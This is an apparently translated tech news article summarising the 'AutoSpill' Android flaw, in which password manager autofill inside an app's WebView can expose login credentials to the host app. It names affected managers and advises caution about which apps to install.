A new security vulnerability has been discovered on Android. It relates to password management applications which would prove to be a little too talkative with your personal data.
Whether on mobile, computer or tablet, password managers have all integrated an autofill functionality. The latter allows Internet users to not have to enter their login credentials each time they connect to a site or app. But, according to recent discoveries, it also allows a malicious application to steal your credentials.
“AutoSpill”, a new vector of piracy
At the Black Hat Europe conference, three researchers from IIITH (a large school located in Telangana, India) demonstrated a flaw nicknamed “AutoSpill”, which allows a malicious application on Android to steal your words password without you realizing it. Concretely, an application that opens a web preview window within it (via the Webview module) can access the data entered by the password manager.
As the researchers explained to the TechCrunch newspaper, when an application opens a Webview window and information from the password manager is entered there “ideally these should only be accessible via the web page displayed on the screen“. Unfortunately, “autofill operation may accidentally expose credentials to the base application“.
In the case of Spotify for example, if you use your password manager to connect to the service via your Facebook account, your data does not remain between the Facebook server and you, but could be read by the Spotify app itself. -even. In the case of a legitimate application, this does not matter much since the pieces of malicious code to intercept your information are not present, but it is more annoying with a compromised app.
Be careful about the apps you download
A modified version of Spotify could thus steal your Facebook identifiers by giving itself the most legitimate appearance since your identifiers would, apparently, never be requested by the app itself, but by the servers, the real ones, from Facebook. “Even without phishing, any malicious app that asks you to log in through another site, like Google or Facebook, can automatically access sensitive information» summarizes one of the researchers.
The problem seems to affect almost every major password manager, from 1Password to LastPass to Keeper to EnPass. Alert messages have already been integrated into some of its applications, but, the problem being on the OS side, we will have to wait for Google to correct the bug directly. In the meantime, be very careful about what apps you download and who you give your login information to.
Source : TechCrunch